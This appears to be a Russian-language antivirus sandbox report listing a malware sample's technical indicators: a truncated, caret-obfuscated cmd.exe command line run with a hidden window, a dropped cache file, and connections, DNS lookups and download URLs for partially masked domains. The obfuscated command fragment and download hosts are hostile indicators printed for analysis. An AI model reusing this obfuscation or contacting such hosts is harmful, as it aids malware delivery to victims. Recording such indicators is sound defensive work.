Техническая информация
- '<SYSTEM32>\cmd.exe' ndhWBjQRaKjd lwBEdpHvYorokFIH HJtWpEl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AnwNbCCfohPIFaY%=XPBczISw&&set %oOFGpBavpzWm%=p&&set %EHvWMSqvjSuF%=o^w&&set...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- 'ea####otball.co.uk':80
- 'ea####otball.co.uk':443
- 'bo###rmusic.com':80
- 'za##do.com':80
- 'av##in.pro':443
- 'av##in.pro':80
- http://ea####otball.co.uk/bkBaMK/
- http://av##in.pro/OEYhFkUj
- 'ea####otball.co.uk':443
- 'av##in.pro':443
- DNS ASK e-##erks.de
- DNS ASK ea####otball.co.uk
- DNS ASK bo###rmusic.com
- DNS ASK za##do.com
- DNS ASK av##in.pro
- '<SYSTEM32>\cmd.exe' ndhWBjQRaKjd lwBEdpHvYorokFIH HJtWpEl & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AnwNbCCfohPIFaY%=XPBczISw&&set %oOFGpBavpzWm%=p&&set %EHvWMSqvjSuF%=o^w&&set... (со скрытым окном)